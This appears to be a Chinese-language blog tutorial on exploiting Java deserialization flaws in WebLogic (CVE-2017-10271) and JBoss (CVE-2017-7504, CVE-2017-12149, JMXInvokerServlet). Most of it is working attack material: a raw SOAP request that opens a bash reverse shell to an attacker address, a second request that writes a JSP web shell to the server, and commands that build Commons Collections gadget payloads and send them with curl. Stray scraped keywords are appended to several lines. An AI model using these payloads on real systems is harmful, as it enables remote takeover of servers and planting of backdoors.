目录html
Weblogic反序列化漏洞java
Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)web
JBOSS反序列化漏洞shell
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)安全
JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)bash
JBoss JMXInvokerServlet 反序列化漏洞服务器
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程当中出现反序列化漏洞,致使可执行任意命令。app
这个漏洞利用工具是 javaexec.exe ,也能够像以下手动发送数据。curl
向存在漏洞的服务器发送的数据jsp
反弹shell
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.10.13:7001 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 642 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/192.168.10.11/4444 0>&1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
写入木马文件
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: your-ip:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 638 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string> <void method="println"><string> <![CDATA[ <% out.print("test"); %> //将这一行的数据换成木马的 ]]> </string> </void> <void method="close"/> </object></java></java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
参考文章:Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及以前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
这个漏洞利用工具是 JavaDeserH2HC 和 javaexec.exe 。
咱们先将其发送到kali上,解压,进入该目录。而后执行下列命令
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success" #该命令会生成ExampleCommonsCollections1WithHashMap.ser文件 curl http://192.168.10.13:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser #将该文件做为body发送
咱们执行的是 touch /tmp/success 命令,咱们进入漏洞服务器,查看,在 /tmp 目录下新建了success目录。
参考文章:JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的状况下尝试未来自客户端的数据流进行反序列化,从而致使了漏洞。
这个漏洞利用工具是 JavaDeserH2HC 、jboss反序列化_CVE-2017-12149.jar 和 javaexec.exe。
下载该工具,上传到Kali,解压,进入目录。执行下面几条命令,便可从目标服务器反弹shell。
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.10.11:4444 curl http://192.168.10.13:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
或者直接利用图形化工具执行命令,可是这个不能反弹shell
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet
请求中读取了用户传入的对象,而后咱们利用Apache Commons Collections中的Gadget执行任意代码。
这个漏洞利用工具是 javaexec.exe 。
本文章全部工具: